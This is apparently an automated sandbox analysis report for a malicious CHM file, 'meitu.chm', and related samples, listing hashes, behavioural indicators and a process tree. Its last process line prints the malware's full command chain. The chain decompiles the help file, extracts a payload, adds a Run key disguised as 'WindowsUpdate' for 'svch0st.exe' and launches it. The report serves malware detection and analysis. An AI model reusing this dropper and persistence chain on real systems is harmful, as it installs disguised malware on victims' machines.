Analysis
-
max time kernel
29s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16-03-2023 03:22
Static task
static1
Behavioral task
behavioral1
Sample
virus/meitu.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
virus/meitu.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
virus/白加黑衍生物/UpgradeShow.dll
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
virus/白加黑衍生物/UpgradeShow.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win10v2004-20230220-en
General
-
Target
virus/meitu.chm
-
Size
1.2MB
-
MD5
3dbfbb912f430ae62df647a767a86884
-
SHA1
0604930ef6eef2e10ae38e9b89d819ecda25f847
-
SHA256
8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1
-
SHA512
984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d
-
SSDEEP
24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl
Malware Config
Signatures
-
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1036 hh.exe 1036 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 1036 wrote to memory of 268 1036 hh.exe conhost.exe PID 1036 wrote to memory of 268 1036 hh.exe conhost.exe PID 1036 wrote to memory of 268 1036 hh.exe conhost.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"2⤵PID:268